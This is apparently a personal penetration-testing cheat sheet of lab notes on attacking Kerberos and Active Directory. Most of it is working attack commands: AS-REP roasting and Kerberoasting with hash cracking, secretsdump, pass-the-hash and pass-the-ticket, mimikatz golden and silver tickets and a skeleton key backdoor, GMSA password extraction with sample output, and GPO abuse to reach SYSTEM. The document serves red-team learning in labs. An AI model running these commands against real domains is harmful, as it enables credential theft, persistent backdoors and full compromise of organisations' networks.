Kerberos (88) / Active Directory (AD)
Active Directory Exploitation Cheat Sheet
S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
Enumeration
AD LDAP enumeration
ldapsearch -x -h $IP -s base # to get the naming context
ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec" # using naming context found above
Impacket-GetNPUsers
The command below checks for accounts that do not need pre-authentication. Crack them with hashcat.
impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers2.hashcat
hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt
Kerbrute Enumeration - No domain access required
./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst
impacket-secretsdump - Authenticated user
impacket-secretsdump -just-dc THM-AD/backup:[email protected]
Pass the Hash through Evil-WinRM
evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Pass the Ticket - Access as a user to the domain required
rubeus.exe harvest /interval:30 (harvest for TGTs every 30 seconds)
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting - Access as any user required
Rubeus Method
Rubeus.exe kerberoast
now that you have some hashes save those into a text file and crack them with hashcat.
hashcat -m 13100 -a 0 hash.txt Pass.txt
Impacket Method
sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request
AS-REP Roasting - Access as any user required
rubeus.exe asreproast
When adding the hashes to a text file remember to add 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User...
hashcat -m 18200 hash.txt pass.txt
Pass the Ticket w/ mimikatz
run mimikatz.exe
run privilege:debug ensure this outputs '20' OK
sekurlsa::tickets /export
Look for a .kirbi file for an account you may already have access such as the 'Adminitrator' account.
Run kerberso:ptt $ticketFile to impersonate the given ticket
Exit mimikatz and run klist to confirm you are using the cached ticket
You should now have Domain Admin rights
Golden/Silver Ticket Attacks w/ mimikatz
Golden ticket means that you are able to generate a TGT for any service you want.
Full domain compromise (domain admin) required
Silver ticket means that you are taking a specific service's TGT and can impersonate it.
Service hash required
Skeleton Key
Full domain compromised (domain admin) required
Run mimikatz
privilege::debug to confirm access
lsadump::lsa /inject /name:krbtgt to dump hashes and other identifiers needed to create a golden ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
You will need to know the user's User ID for the next mimikatz command. You can find this by running the command below (look at the last 3-4 digits).
wmic useraccount where name='%username%' get sidkerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtg t:72cd714611b64cd4d5550cd2759db3f6 /id:500 This is the command for creating a golden ticket; to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.
misc::cmd this will open a new elevated command prompt with the given ticket in mimikatz. You now have the permissions depending on golden ticket or silver ticket used.
Dump all NTLM hashes with mimikatz
lsadump::lsa /patch
Crack with hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt
Kerberos Backdoors w/ mimikatz
misc::skeleton
net use c:\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \Desktop-1\c$ /user:Machine1 mimikatz
Exploitation
Group Managed Service Accounts (GMSA)
Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.
These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.
Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword
If we have access to an account that is in the same group as the service account then we should be able to extract the password hash of the service account.
*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'
DistinguishedName : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : svc_apache
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName : svc_apache$
SID : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName :
*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...Looks like we have the ReadGMSAPassword privilege on the svc_apache account.
We can retrieve the password hash with GMSAPasswordReader.
*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : EA5055089775D4E018B085C20648D794
[*] aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*] aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*] des_cbc_md5 : 312FDCDA9DADDCCD
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*] aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*] aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*] des_cbc_md5 : 9E340723700454E9
We have the service account password hash and can use this for pass the hash logins (evil-winrm needs the $ sign at the end when logging in with hash).
ZeroLogon
This will break Active Directory so only use it to check if the exploit is possible
python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP
GPO Abuse via SharpGPOAbuse
If our user has access to the GpoEditDeleteModifySecurity permission then we can give ourselves local administrator privileges. We can confirm this by running Get-NetGPO and running the name GUID string through Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /force updates Group Policies
net localgroup Administrators verify we are now in the Administrator group
python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:[email protected] to get SYSTEM access
Last updated